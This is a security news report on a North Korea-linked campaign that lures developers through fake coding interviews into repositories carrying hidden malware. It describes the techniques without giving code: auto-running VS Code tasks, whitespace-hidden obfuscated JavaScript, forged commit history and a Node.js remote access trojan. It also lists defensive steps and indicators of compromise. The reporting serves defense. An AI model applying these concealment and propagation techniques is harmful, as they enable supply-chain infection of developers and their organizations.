A North Korea-linked hacking group known as Void Dokkaebi, also tracked as Famous Chollima, is running a campaign that tricks software developers into installing malware through fake job interviews.
The group lures developers into cloning infected code repositories as part of a fabricated coding test, then turns their machines and projects into malware-spreading tools.
The attack starts with a convincing setup. Threat actors pose as recruiters from cryptocurrency and artificial intelligence firms, reaching out to developers on professional platforms.
During a fake interview, the target is asked to clone a repository on GitHub, GitLab, or Bitbucket and run it as a “technical assessment.”
These repositories look like legitimate projects but carry hidden malicious code that runs the moment the developer opens the folder.
What makes this campaign dangerous is what happens after that first infection. Trend Micro analysts identified that Void Dokkaebi does not stop at a single compromised developer.
The attacker uses the victim’s own machine and repositories to infect the next wave of developers, creating a worm-like chain that spreads across organizations without further social engineering.
By March 2026, the scale had grown significantly. Analysis by Trend Micro Research identified more than 750 infected repositories, over 500 malicious VS Code task configurations, and 101 instances of a commit tampering tool across public code hosting platforms.
Repositories belonging to organizations such as DataStax and Neutralinojs were also found carrying infection markers, showing the campaign had reached into popular open-source projects.
Once a compromised developer pushes code to GitHub or reuses components elsewhere, the malicious files travel with it, waiting for the next developer to open the project and trigger the attack, creating a cycle that grows with every commit.
Inside the Infection Chain
The campaign uses two methods working together. The first abuses Visual Studio Code workspace files, specifically a hidden file called .vscode/tasks.json, configured to run automatically when the developer opens the project folder.
When the developer accepts the workspace trust prompt, the malicious task executes without further interaction, fetching a backdoor from a remote URL or launching a disguised file inside the repository carrying the payload.
.webp)
The second method is more direct. After gaining remote access to a developer’s machine, obfuscated JavaScript is injected into source files in the victim’s own repositories.
The code is pushed to the far right of the screen using whitespace, hiding it during quick reviews.
A batch script called temp_auto_push.bat rewrites git commit history by copying the original author name, timestamp, and message before force-pushing the tampered version to appear as a legitimate commit.
.webp)
The delivered payload is a variant of the DEVSPOPPER remote access trojan, a cross-platform Node.js-based tool. It connects to a command-and-control server via WebSocket and uses HTTP for file exfiltration.
A multi-operator session system lets several threat actors work on one compromised machine at the same time.
The RAT detects and avoids CI/CD environments and cloud sandboxes, running only on real developer workstations, so automated pipeline scanning will miss it.
Developers and organizations can take steps to reduce exposure. Always run interview code in isolated or disposable virtual environments destroyed after the session, and never execute it on personal or production machines.
Add .vscode/ to .gitignore and enforce this across all organizational repositories to block passive worm propagation. Require GPG- or SSH-signed commits with branch protection and mandatory pull requests to stop the commit-tampering tool.
Audit source code for infection markers global′!′ and global’_V’, and check for temp_auto_push.bat.
Monitor outbound connections to blockchain API endpoints such as api.trongrid.io and Binance Smart Chain RPC endpoints from developer workstations.
Endpoint-level detection on developer workstations is essential since the RAT avoids CI/CD environments by design.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
